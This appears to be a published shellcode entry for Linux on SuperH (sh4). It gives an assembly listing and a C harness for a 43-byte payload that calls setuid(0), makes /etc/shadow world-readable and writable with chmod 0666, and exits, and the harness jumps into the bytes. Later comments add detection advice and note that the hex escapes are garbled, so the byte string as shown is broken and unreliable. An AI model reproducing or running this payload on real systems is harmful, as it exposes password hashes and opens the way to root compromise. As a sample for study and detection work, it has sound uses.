
# Title : Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
# Published : 2011-06-22
# Author :


/*
** Title:     Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
** Date:      2011-06-22
** Tested on: Debian-sh4 2.6.32-5-sh7751r
** Author:    Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
**
** seteuid:	(label as published; syscall number 23 with r4 = 0 is the setuid(0) named in the title)
** 	mov 	#23, r3
** 	xor	r4, r4
** 	trapa 	#2
** chmod:
** 	mov	#15, r3
** 	mova	@(24, pc), r0
** 	mov	r0, r4
** 	mov	#87, r8
** 	mov	#5, r9
** 	mul.l	r8, r9
** 	sts	macl, r5
** 	add	#3, r5
** 	trapa	#2
** exit:
** 	xor	r3, r3
** 	mov	#1, r3
** 	xor	r4, r4
** 	trapa 	#2
** file:
** 	.string "/etc/shadow"
**
*/

#include <stdio.h>
#include <string.h>

/*
 * SC holds the payload described in the header comment as a C string
 * literal (4 rows: 11 + 11 + 11 + 10 = 43 byte values, matching the title).
 *
 * Per the assembly listing in the header, the payload issues three system
 * calls through "trapa #2", with the syscall number in r3:
 *   - 23 with r4 = 0                -> setuid(0) in the title
 *   - 15 with r4 = path, r5 = mode  -> chmod("/etc/shadow", 0666)
 *   -  1 with r4 = 0                -> exit(0)
 * The mode is built arithmetically in the listing: 87 * 5 + 3 = 438, which
 * is 0666 in octal.
 *
 * The last 11 byte values (2f 65 74 63 2f 73 68 61 64 6f 77) are the ASCII
 * path "/etc/shadow"; no terminator is encoded, so the path presumably
 * relies on the NUL that ends the C literal.
 *
 * Detection and hardening view: the observable effect is /etc/shadow
 * becoming world-readable and world-writable. File-integrity monitoring on
 * the mode of /etc/shadow and an audit rule on permission changes to that
 * file both surface it, and the chmod only succeeds for a process that
 * already holds root or the equivalent privilege.
 *
 * NOTE(review): the "\x" escape prefixes appear to have been lost when this
 * page was extracted. As rendered, the literal is the printable text
 * "x17xe3..." rather than 43 raw bytes, so strlen(SC) will not report 43.
 */
char *SC = "x17xe3x4ax24x02xc3x0fxe3x05xc7x03"
           "x64x57xe8x05xe9x87x09x1ax05x03x75"
           "x02xc3x3ax23x01xe3x4ax24x02xc3x2f"
           "x65x74x63x2fx73x68x61x64x6fx77";

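/*
 * Test harness: print the length of the SC string, then transfer control
 * to it.
 *
 * Returns 0 if the call through SC ever comes back. Per the header
 * listing the payload ends in exit(0), so a return is not expected when
 * the bytes actually execute.
 */
int main(void)
{
  /*
   * strlen() returns size_t; passing it to "%d" is a format/argument
   * mismatch, so cast and print as unsigned long. The original format
   * string also ended in a literal 'n' where a newline was intended.
   */
  fprintf(stdout, "Length: %lu\n", (unsigned long)strlen(SC));

  /*
   * Casts the data pointer SC to a function pointer and calls it.
   * ISO C does not define this conversion. String literals are also
   * typically placed in read-only, non-executable memory, so on a system
   * enforcing NX / W^X this call faults instead of running the bytes.
   */
  (*(void(*)()) SC)();

  return 0;
}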